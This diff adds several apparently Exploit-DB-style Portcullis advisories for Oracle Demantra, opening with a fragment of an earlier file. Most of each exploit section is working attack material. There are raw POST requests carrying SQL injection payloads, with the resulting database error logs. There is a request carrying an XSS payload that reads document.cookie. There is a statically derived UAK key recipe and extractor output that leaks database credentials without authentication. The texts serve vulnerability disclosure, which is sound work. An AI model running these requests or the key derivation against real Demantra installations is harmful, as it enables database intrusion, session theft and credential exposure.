+
+
+
+
+
+
+
+
+
+-snip-?
+
+Copyright:
+
+Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
diff --git a/platforms/windows/webapps/31993.txt b/platforms/windows/webapps/31993.txt
new file mode 100755
index 000000000..ee06187d3
--- /dev/null
+++ b/platforms/windows/webapps/31993.txt
@@ -0,0 +1,71 @@
+Details:
+
+Application is vulnerable to SQL injection.
+Impact:
+
+An attacker with access to the vulnerable pages could manipulate the queries being sent to the database, potentially enabling them to:
+
+- Extract sensitive information, including (but not limited to) authentication credentials and personal details. Such information could be sold by the attacker to other malicious individuals, used in other attacks (as the same password is often used across systems) or released publicly to damage the organisation’s reputation.
+
+- Modify content within the application. If this was possible, the attacker could add malicious code to the application, which could then be used to deliver malware or exploit issues within client browsers.
+
+In this particular instance, exploitation was more difficult as the results of the attack had to inferred based on the pages returned, often referred to as “blind” SQL Injection. This does not prevent exploitation, it simply means that the methods required to perform this attack require a very large number of requests to be made. However, because of this it is potentially easier to identify that an attack using this method is being attempted.
+Exploit:
+
+POST /demantra/portal/editExecDefinition.jsp HTTP/1.1
+Host: www.target.com:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
+Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 388
+
+done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23¶m=
+
+Related Error Log Entry:
+
+2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:
+[error occurred during batching: ORA-01756: quoted string not properly terminated]
+UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3
+WHERE EXEC_ID = 5
+2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:
+com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
+
+Sample Request #2:
+
+POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1
+Host: www.target.com:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp
+Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 170
+
+selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on
+
+Related Error Log Entry:
+
+… 39 more
+
+2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:
+[error occurred during batching: ORA-00933: SQL command not properly ended]
+UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9
+2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:
+com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
+
+Copyright:
+
+Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
diff --git a/platforms/windows/webapps/31994.txt b/platforms/windows/webapps/31994.txt
new file mode 100755
index 000000000..06d7d9619
--- /dev/null
+++ b/platforms/windows/webapps/31994.txt
@@ -0,0 +1,146 @@
+Details:
+
+The TaskSender area is vulnerable to a stored cross-site scripting vulnerability.
+Impact:
+
+An attacker could exploit this flaw to get active HTML or script code executed in an authenticated user’s browser. Cross-site Scripting may be used to perform attacks such as session hijacking by invoking the user’s browser to send information stored in their cookies (such as a session identification token) to an arbitrary location controlled by the attacker. Furnished with this information the attacker could immediately access the site, masquerading as the authenticated user who viewed the page containing the malicious code. The attacker would then be able to perform actions as the authorised user, subject to their role, which could include viewing sensitive data, modifying profile information and making transactions.
+
+This vulnerability could also be leveraged in a “phishing” attack, whereby the attacker adds additional HTML code to create a false login page within the vulnerable page, which posts the data to a server controlled by the attacker. The attacker could then redirect the user back to the original server, thus giving the illusion that the login was secure and genuine. This could also be achieved by redirecting the user to a false login page on the attacker’s server rather than adding the code to a page that already exists. This is critical, because if the attacker could host a “phishing” website in a domain with a valid SSL certificate, there would be no way for a user to spot the attack.
+
+A variation of the “phishing” attack described above would be to inject code to completely rewrite the genuine page, defacing the site and possibly having a detrimental impact on the reputation of the company.
+
+Finally, an attacker could use Cross-site Scripting to exploit vulnerabilities within web browsers. The outcome of such an attack would depend on the exploits used, but in a worst case scenario the attacker could gain full control of a user’s computer. Once that had been achieved it would be trivial for the attacker to install a keystroke logger and gain access to applications via the usernames and passwords they had acquired.
+
+In the case of the current web application, the Cross-site Scripting was “reflective”, meaning that a user would need to follow a specially crafted link for the attack to be successful.
+Exploit:
+
+Request:
+
+POST /demantra/TaskSender HTTP/1.1
+Host: www.target.com:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305
+Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291
+Content-Length: 3093
+
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="selectedUsersVector"
+
+389
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="selectedUserList"
+
+389;
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="message"
+
+asdasda
+----------97315614820331578362291
+Content-Disposition: form-data; name="description"
+
+asdasdasdas
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="url"
+
+aaa"onmouseover="alert(document.cookie)
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="sendEmail"
+
+1
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="hidden_dueTime"
+
+08/02/2013
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="hidden_alertTime"
+
+08/02/2013
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="hidden_dueTimeHours"
+
+14:30
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="hidden_alertTimeHours"
+
+08:30
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="hidden_escalateUserList"
+
+
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="combination"
+
+
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="dueTime"
+
+08/02/2013
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="alertTime"
+
+08/02/2013
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="tkn"
+
+187120466014305
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="attachment"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="localizedDueTime"
+
+08/02/2013
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="dueTimeHours"
+
+14:30
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="localizedAlertTime"
+
+08/02/2013
+---------------12454397315614820331578362291
+Content-Disposition: form-data; name="alertTimeHours"
+
+08:30
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="escalateUserList"
+
+
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="sendEmailCheckbox"
+
+on
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="x"
+
+50
+-----------------------------12454397315614820331578362291
+Content-Disposition: form-data; name="y"
+
+7
+-----------------------------12454397315614820331578362291--
+
+Resulting Code in page:
+
+
+
+
+
+
+
+asdasda
+
+Copyright:
+
+Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
diff --git a/platforms/windows/webapps/31995.txt b/platforms/windows/webapps/31995.txt
new file mode 100755
index 000000000..2c8f049f2
--- /dev/null
+++ b/platforms/windows/webapps/31995.txt
@@ -0,0 +1,41 @@
+Details:
+
+Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
+Impact:
+
+A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
+Exploit:
+
+The target URL is:
+
+http://target.com:8080/demantra/ServerDetailsServlet?UAK=
+
+Now the UAK key is calculated statically:
+
+ String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
+
+ StringBuffer tmp = new StringBuffer("sge");
+ tmp.append(0);
+ tmp.append(encryptedPassword);
+
+ uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
+
+From that information it is possible to create a simple extractor:
+
+pixel:demantra user$ java getUAK
+-=[Oracle Demantra Database Details Retriever ]=-
+
+[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
+[+] Retrieved the following encrypted string:
+4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
+[+] Decrypted string is:
+TEST?test?demantra?orc?1
+
+Together with the authentication bypass this can be exploited unauthenticated as well.
+
+Copyright:
+
+Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+Disclaimer:
+
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|